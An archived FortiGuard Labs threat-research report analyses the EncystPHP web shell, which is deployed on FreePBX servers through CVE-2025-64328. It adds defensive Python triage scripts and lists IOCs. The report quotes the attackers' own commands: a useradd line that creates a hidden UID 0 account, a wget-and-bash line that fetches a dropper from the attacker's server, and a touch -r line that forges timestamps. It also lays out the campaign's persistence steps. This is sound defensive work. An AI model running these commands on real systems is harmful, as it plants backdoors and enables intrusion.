Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
By Vincent Li
Published: 2026-01-28 · Archived: 2026-04-02 10:46:39 UTC

Affected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High

FortiGuard Labs has discovered a web shell that we named "EncystPHP." It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. The incidents began in early December last year and propagated via exploitation of the FreePBX vulnerability CVE-2025-64328. The malicious activity appears to be associated with the hacker group INJ3CTOR3, first identified in 2020, which at that time targeted CVE-2019-19006. In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461.

These incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments. We assess that this campaign represents recent attack activity and behavior patterns associated with INJ3CTOR3. The following sections provide an in-depth analysis of the related incidents and the EncystPHP web shell.

Incidents

The web shell was delivered via CVE-2025-64328, a post-authentication command-injection vulnerability in the administrative interface of the FreePBX Endpoint Manager. Because the flaw is post-authentication, exploitation requires an authenticated session on the FreePBX administrative GUI, so credential theft, weak or default administrator passwords, or an exposed admin interface are the preconditions defenders should look for. The exploit originated from Brazil and targeted a victim environment managed by an Indian technology company specializing in cloud solutions, communication services, and IT infrastructure.

https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp Page 1 of 16

Figure 1: FreePBX administrative interface

The attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202, which resolves to the domain crm[.]razatelefonia[.]pro.
The associated web page, Raza Telefonia, which appears to be a VoIP management system, includes a login interface.

Figure 2: EncystPHP attack traffic via CVE-2025-64328

Figure 3: Malware download website

When the route new/ on the download source is requested, the request is automatically redirected to another dropper named k.php.

Figure 4: Malware download source redirects to the EncystPHP dropper

Malware Analysis

EncystPHP was initially delivered by exploiting the FreePBX vulnerability CVE-2025-64328. It deployed a web shell on victim hosts via the file named "c", which serves as the starting point for the following analysis.

Figure 5: The EncystPHP file flow

The dropper first changes the permissions of ajax.php and model.php to 000, rendering both files unreadable, unwritable, and non-executable for every user except root (the permissions are restored at the end of the dropper's run, as described below).

Figure 6: Modifying file permission to 000

EncystPHP then attempts to collect database configuration information from /etc/freepbx.conf and proceeds to delete cron job entries and multiple FreePBX user accounts, including "ampuser," "svc_freepbx," "freepbx_svc," "bluej," "nahda," "FreePBX_setup," "emoadmin," and "nvd0rz."

Figure 7: Collecting database configurations and deleting commands and users

It then searches for PHP files associated with web shells by identifying content such as Base64 decode functions, packet headers, or PHP functions that execute shell commands, and deletes all matching files.

Figure 8: Deleting other PHP web shells

EncystPHP also scans for PHP files containing strings such as "Badr," "b3d0r," "pastebin," "yokyok," or "bm2cjjnRXac1WW3KT7k6MKTR," and removes these files.
These may be related to older versions of the web shell itself or to other malicious PHP files; in either case the dropper is evicting stale or competing shells before installing its own.

Figure 9: Deleting PHP files with specific strings

To facilitate persistent control over the compromised host, the malware creates a root-level user named newfpbx, resets multiple user account passwords to a single value, and escalates their privileges.

useradd -s /bin/bash -ou 0 -g 0 -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx &>/dev/null

The -o flag permits a non-unique UID, so -ou 0 -g 0 gives newfpbx UID and GID 0: a second root account under a name chosen to resemble a FreePBX service user. The -p argument is a pre-computed MD5-crypt ($1$) password hash, so the cleartext password never appears in the dropper. Any entry in /etc/passwd other than root with UID 0 is therefore a direct indicator of this stage.

Figure 10: Modifying system user with the same password

Following this behavior, EncystPHP injects an SSH public key and modifies system configuration to ensure that the default SSH port (22) remains open, giving the operator interactive access that does not depend on the web shell surviving.

Figure 11: Injecting the SSH public key

Figure 12: Ensuring SSH is always open

It then downloads an additional dropper to support further web shell deployment and persistence:

(setsid wget "hxxp://45[.]234[.]176[.]202/new/k.php" -O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; bash /var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null & ) 2>&1

Figure 13: Downloading another dropper with a Base64-encoded command

At the final stage of the c dropper's execution, EncystPHP tampers with log files and deletes the FreePBX Endpoint Manager module named endpoint, the same module whose vulnerability provided initial access. After completing these actions, it restores the file permissions on the FreePBX-related files and reloads the configuration to avoid a service exception.

Figure 14: Erasing traces and removing the endpoint module

The c dropper then deploys a Base64-encoded web shell and downloads another dropper, named k.php. The k.php dropper performs similar actions, including deploying a Base64-encoded web shell, installing configuration components, and establishing persistence mechanisms.

Web Shell

The payload is delivered in Base64-encoded format and decoded at runtime by the dropper component.
The decoded PHP web shell is written to disk, masquerading as a legitimate FreePBX file named ajax.php, allowing it to blend into the application structure.

Figure 15: Base64-encoded web shell

Authentication is performed using a simple verification mechanism in which a plaintext password entered via the web interface is hashed with MD5 and compared against a hard-coded hash value embedded in the web shell. Because the hash is unsalted MD5, a defender who recovers a copy of the shell can attempt to crack it offline to learn the operator's password.

Figure 16: Web shell authentication verification interface source code

Figure 17: Web shell authentication verification interface

Figure 18: Verifying hard-coded MD5 credentials

Upon successful authentication, the web shell exposes an interactive interface titled Ask Master. This interface includes multiple predefined operational commands, such as file system enumeration, process inspection, querying active Asterisk channels, listing Asterisk SIP peers, and retrieving multiple FreePBX and Elastix configuration files.

Figure 19: Web shell interface source code

Figure 20: Web shell interface

By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges, enabling arbitrary command execution on the compromised host and the initiation of outbound call activity through the PBX environment.

Figure 21: Elastix and FreePBX privilege escalation

Dropper

The file k.php also contains the previously mentioned Base64-encoded web shell. Once executed, it decodes the payload and writes it to disk as ajax.php, deploying it to multiple locations.
Figure 22: Web shell deployment

The dropper creates several directories under /var/www/html/, including digium_phones/, rest_phones/, digium_phoness/, phones/, fpbxphones/, freepbxphones/, and freepbx/. It then copies the EncystPHP web shell from /var/www/html/admin/views/ajax.php and /var/www/html/rest_phones/ajax.php to the following paths. These paths correspond to commonly accessible web routes, increasing resilience by ensuring that alternative access points remain available if one instance is removed.

/var/www/html/rest_phones/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/phones/ajax.php
/var/www/html/digium_phoness/ajax.php
/var/www/html/fpbxphones/ajax.php
/var/www/html/freepbxphones/ajax.php
/var/www/html/freepbx/ajax.php

After deploying the web shell, the dropper forges timestamps to match those of legitimate files, reducing the likelihood of detection during routine inspection:

touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php

touch -r copies only the access and modification times of the reference file. The inode change time (ctime) is set by the kernel at the moment of the change and cannot be set from userspace, so a file whose mtime is much older than its ctime is a candidate for this kind of back-dating.

Next, the malware decodes a Base64-encoded configuration file and writes it to /var/www/html/admin/views/.htaccess. This configuration uses RewriteCond and RewriteRule directives for URL redirection. The conditions first verify that the requested resource is neither a directory, a file, nor a symbolic link (the !-d, !-f and !-l tests). The final rule specifies that requests beginning with one or more whitespace characters are redirected to config.php, one of the paths the web shell was copied to.
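The following script is an added example (not code from the FortiGuard report) that shows how the timestamp forgery above can be spotted from the ctime/mtime gap. It builds a throwaway web root: a freshly written stand-in for footer.php and a dropped ajax.php whose mtime is pushed back to the value a genuinely old reference file would carry, which is the effect of the touch -r command. The directory layout, file contents and the 60-second slack are assumptions; on a real host you would point scan_tree at /var/www/html.

```python
"""Spot touch -r timestomping of dropped PHP files (added example, not the
report's tooling). touch -r copies atime/mtime from a reference file, but the
inode change time (ctime) is always set by the kernel and cannot be set from
userspace, so mtime far older than ctime means the file was back-dated (or was
unpacked from an archive that preserved mtimes, the main source of false positives).
Linux semantics assumed: on Windows st_ctime is the creation time, not change time."""
import os
import shutil
import tempfile
import time


def looks_timestomped(path, slack=60.0):
    """True when the file's mtime is older than its ctime by more than slack seconds."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack


def scan_tree(root, suffixes=(".php", ".htaccess")):
    """Walk root and return sorted relative paths of back-dated candidate files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(suffixes):
                full = os.path.join(dirpath, name)
                if looks_timestomped(full):
                    hits.append(os.path.relpath(full, root))
    return sorted(hits)


def demo():
    """Constructed scenario: a fresh legitimate file next to a dropped shell whose
    mtime was copied from an old reference (what `touch ajax.php -r footer.php` does).
    A temp dir cannot hold a file with a genuinely old ctime, so footer.php is left
    untouched and only ajax.php gets the old mtime."""
    root = tempfile.mkdtemp(prefix="fpbx-")
    try:
        views = os.path.join(root, "admin", "views")
        os.makedirs(views)
        footer = os.path.join(views, "footer.php")
        shell = os.path.join(views, "ajax.php")
        with open(footer, "w") as f:
            f.write("<?php // constructed stand-in for a legitimate FreePBX file\n")
        with open(shell, "w") as f:
            f.write("<?php // constructed stand-in for the dropped web shell\n")
        old = time.time() - 400 * 86400  # mtime a long-installed footer.php would carry
        os.utime(shell, (old, old))       # atime/mtime back-dated; ctime stays "now"
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print("back-dated files:", demo())
```

The check is cheap enough to run across the whole web root, but treat hits as leads rather than verdicts: package managers and tar extractions also leave mtime older than ctime, so confirm a hit by comparing the file's content with the distribution copy or with a known-good install.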
Figure 23: Configuration of EncystPHP

Finally, the dropper decodes and writes the Base64-encoded shell script to /var/spool/asterisk/tmp/test.sh and /tmp/test.sh. The script is executed with bash, after which the attacker removes the script to eliminate forensic artifacts.

Figure 24: Base64-encoded persistence shell script

Persistence

The persistence mechanism implemented by EncystPHP consists of four parts.

The first establishes persistence before test.sh is executed. In this stage, the dropper c installs multiple crontab entries that download the secondary dropper k.php every minute, saving it as /var/lib/asterisk/bin/zen2 and /var/lib/asterisk/bin/devnull2.

Figure 25: Initial persistence method in the dropper c

Next, test.sh triggers the second and third persistence stages. It decodes a Base64-encoded file named license.php and writes it to /var/www/html/admin/modules/freepbx_ha/. This file subsequently downloads the two droppers, c and k.php, and installs additional crontab entries.

Figure 26: Persistence shell script "test.sh"

The third stage periodically downloads the dropper k.php and saves it as /var/lib/asterisk/bin/devnull every three minutes. It then echoes the rm command three times without executing it, creating the appearance that EncystPHP has been removed from the system.

Figure 27: Cron tab command in "test.sh"

The fourth persistence stage is executed via license.php. It downloads the dropper k.php as /var/lib/asterisk/bin/devnull2, and the dropper c as /var/lib/asterisk/bin/devnull23 and /trmp/devnull24, at one-minute intervals. In addition to maintaining persistence, this stage disables error reporting, executes EncystPHP, and removes log artifacts to hinder detection.

Because these loops re-download the droppers every one to three minutes, deleting the web shell files alone is not a cleanup. The crontab entries, license.php, the copies under /var/lib/asterisk/bin/, the newfpbx account, and the injected SSH key all have to be removed in the same pass, ideally with the host isolated from the network, or the host will be reinfected before the cleanup is finished.
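The script below is an added example, not FortiGuard's tooling, that turns the host artifacts described in the Malware Analysis, Dropper and Persistence sections into offline triage checks: UID 0 accounts other than root, crontab lines that fetch from the report's IOC hosts or into /var/lib/asterisk/bin/ (and the decoy echo rm lines), PHP files at the listed drop paths or carrying the decode-then-execute pattern, the marker strings, or the MD5-of-request-parameter login, and .htaccess rules that rewrite to config.php. The sample passwd, crontab, PHP and .htaccess text are constructed to resemble those artifacts and are assumptions, not captures from the report; on a real host you would feed it /etc/passwd, the root and asterisk crontabs, and the files under /var/www/html.

```python
"""Offline triage for the EncystPHP artifacts (added example, not the report's
tooling). Sample inputs are constructed to resemble the described artifacts; the
crontab and .htaccess text in particular are assumptions, not captures."""
import re

# Drop locations listed in the Dropper and Persistence sections.
SHELL_PATHS = {
    "/var/www/html/admin/views/ajax.php", "/var/www/html/rest_phones/ajax.php",
    "/var/www/html/admin/modules/core/ajax.php", "/var/www/html/digium_phones/ajax.php",
    "/var/www/html/admin/assets/js/config.php", "/var/www/html/admin/assets/config.php",
    "/var/www/html/admin/assets/ajax.php", "/var/www/html/phones/ajax.php",
    "/var/www/html/digium_phoness/ajax.php", "/var/www/html/fpbxphones/ajax.php",
    "/var/www/html/freepbxphones/ajax.php", "/var/www/html/freepbx/ajax.php",
    "/var/www/html/admin/modules/freepbx_ha/license.php",
}
# Strings the dropper itself greps for when purging older or rival shells.
SHELL_MARKERS = ("Badr", "b3d0r", "pastebin", "yokyok", "bm2cjjnRXac1WW3KT7k6MKTR")
# Network IOCs from the report, with the defanging brackets removed.
IOC_HOSTS = ("45.234.176.202", "187.108.1.130", "razatelefonia.pro")
DROPPER_DIR = "/var/lib/asterisk/bin/"


def uid0_accounts(passwd_text):
    """Accounts other than root that carry UID 0 (what useradd -o -u 0 creates)."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 3 and f[2] == "0" and f[0] != "root":
            hits.append(f[0])
    return hits


def suspicious_cron(cron_text):
    """Crontab lines that fetch from IOC hosts or into the asterisk bin directory,
    plus the decoy 'echo rm' lines that only pretend to clean up."""
    hits = []
    for raw in cron_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fetches = re.search(r"\b(wget|curl)\b", line) is not None
        if any(h in line for h in IOC_HOSTS) or (fetches and DROPPER_DIR in line):
            hits.append(("download", line))
        elif re.search(r"\becho\s+rm\b", line):
            hits.append(("decoy", line))
    return hits


def php_indicators(src):
    """Content heuristics: decode-then-execute, marker strings, MD5 login check."""
    decode = re.search(r"base64_decode\s*\(", src)
    execf = re.search(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", src)
    return {
        "decode_exec": bool(decode and execf),
        "markers": [m for m in SHELL_MARKERS if m in src],
        "md5_auth": bool(re.search(r"md5\s*\(\s*\$_(?:POST|GET|REQUEST)\b", src)),
    }


def htaccess_rewrites_to(text, target="config.php"):
    """Patterns of RewriteRule lines whose substitution points at target."""
    rules = (re.match(r"\s*RewriteRule\s+(\S+)\s+(\S+)", ln) for ln in text.splitlines())
    return [m.group(1) for m in rules if m and target in m.group(2)]


def triage(passwd_text, cron_text, php_files, htaccess_text):
    """Run every check; php_files maps path -> source text."""
    content = {}
    for path, src in php_files.items():
        ind = php_indicators(src)
        if ind["decode_exec"] or ind["markers"] or ind["md5_auth"]:
            content[path] = ind
    return {
        "uid0": uid0_accounts(passwd_text),
        "cron": suspicious_cron(cron_text),
        "shell_paths": sorted(p for p in php_files if p in SHELL_PATHS),
        "shell_content": content,
        "htaccess": htaccess_rewrites_to(htaccess_text),
    }


# Constructed samples (not captures): what the artifacts would look like on a host.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin\n"
                 "newfpbx:x:0:0::/home/newfpbx:/bin/bash\n")
SAMPLE_CRON = ("* * * * * wget -q hxxp://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/zen2\n"
               "*/3 * * * * echo rm -f /var/lib/asterisk/bin/devnull\n"
               "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n")
SAMPLE_PHP = {
    "/var/www/html/admin/views/ajax.php":
        "<?php if (md5($_POST['pass']) === $HASH) { passthru(base64_decode($_POST['c'])); }",
    "/var/www/html/admin/views/footer.php": "<?php echo '</body></html>';",
    "/var/www/html/admin/old.php": "<?php // yokyok\n",
}
SAMPLE_HTACCESS = ("RewriteEngine On\nRewriteCond %{REQUEST_FILENAME} !-d\n"
                   "RewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-l\n"
                   "RewriteRule ^\\s+ config.php [L]\n")

if __name__ == "__main__":
    print(triage(SAMPLE_PASSWD, SAMPLE_CRON, SAMPLE_PHP, SAMPLE_HTACCESS))
```

The path and marker lists are copied from the report, so they will age; the content heuristics (decode-then-execute and an MD5 comparison of a request parameter) are the part that keeps catching renamed copies. A genuine FreePBX install does ship files named ajax.php, so a path hit on its own should be confirmed by diffing against the packaged copy.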
Figure 28: Persistence PHP file license.php

Conclusion

This incident demonstrates how CVE-2025-64328 can be exploited to deploy stealthy, persistent web shells such as EncystPHP in FreePBX environments, underscoring that unpatched PBX systems remain high-value targets. Although the attack techniques are not entirely new, the observed behavior reflects an active and ongoing threat that closely mirrors historical INJ3CTOR3 campaigns while adapting to current operational contexts. Because it can blend into legitimate FreePBX and Elastix components, such activity may evade immediate detection, leaving affected systems exposed to well-known risks, including long-term persistence, unauthorized administrative access, and abuse of telephony resources. Organizations should treat any successful exploitation of this vulnerability as a full compromise and prioritize immediate remediation, monitoring, and security hardening to mitigate further impact.

Fortinet Protections

The malware described in this report is detected and blocked by FortiGuard Antivirus as:

PHP/EncystPHP.A!tr
BASH/EncystPHP.A!tr

The FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running these products with up-to-date signatures are protected against the malware components described in this report.

The FortiGuard Web Filtering Service blocks the C2 server.

FortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerability:

CVE-2025-64328: 59448 FreePBX.Administration.GUI.filestore.Command.Injection

Organizations seeking to strengthen foundational security awareness may also consider completing Fortinet Certified Fundamentals (FCF) training in Cybersecurity.
This module is designed to help end users learn how to identify and protect themselves from phishing attacks.

The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with this campaign by correlating malicious IP intelligence collected from Fortinet's global sensor network, CERT collaborations, MITRE, trusted industry partners, and other intelligence sources.

If you believe this or any other cybersecurity threat has impacted your organization, contact our Global FortiGuard Incident Response Team for assistance.

IOCs

URLs
hxxp://45[.]234[.]176[.]202/new/c
hxxp://45[.]234[.]176[.]202/new/k.php

Hosts
45[.]234[.]176[.]202
187[.]108[.]1[.]130

Files (SHA-256)
71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302
7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574
fc514c45fa8e3a49f003eae4e0c8b6a523409b8341503b529c85ffe396bb74f2
285fac34a5ffdac7cb047d412862e1ca5e091e70c0ac0383b71159fdd0d20bb2
29d74963f99563e711e5db39261df759f76da6893f3ca71a4704b9ee2b26b8c7

MITRE ATT&CK Mapping for EncystPHP Campaign

Tactic | Technique ID | Technique Name | Observed Activity in EncystPHP
Initial Access | T1190 | Exploit Public-Facing Application | Exploitation of FreePBX Endpoint Manager via CVE-2025-64328 to execute post-authentication command injection
Execution | T1059.004 | Command and Scripting Interpreter: Unix Shell | Execution of Bash commands via injected payloads and downloaded shell scripts
Persistence | T1053.003 | Scheduled Task/Job: Cron | Multiple crontab entries installed to repeatedly download and execute droppers
Persistence | T1505.003 | Server Software Component: Web Shell | Deployment of EncystPHP masquerading as legitimate FreePBX PHP files (ajax.php, config.php)
Privilege Escalation | T1068 | Exploitation for Privilege Escalation | Abuse of FreePBX administrative context to execute commands with elevated privileges
Persistence | T1136.001 | Create Account: Local Account | Creation of a root-level user account (newfpbx) with UID 0
Credential Access | T1003 | OS Credential Dumping | Collection of database credentials from /etc/freepbx.conf
Defense Evasion | T1070.004 | Indicator Removal on Host: File Deletion | Deletion of logs, cron artifacts, and the FreePBX Endpoint Manager module
Defense Evasion | T1222.002 | File and Directory Permissions Modification: Linux | Modification of file permissions to 000 to block access and disrupt inspection
Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | Web shell written to legitimate FreePBX file paths with forged timestamps
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Removal of competing web shells and disabling of error reporting
Lateral Movement | T1021.004 | Remote Services: SSH | Injection of attacker-controlled SSH public key and forced exposure of port 22
Command and Control | T1105 | Ingress Tool Transfer | Repeated download of droppers (c, k.php) from attacker-controlled infrastructure
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | Use of HTTP for payload delivery and command execution
Impact | T1496 | Resource Hijacking | Abuse of PBX resources for unauthorized telephony operations

Source: https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp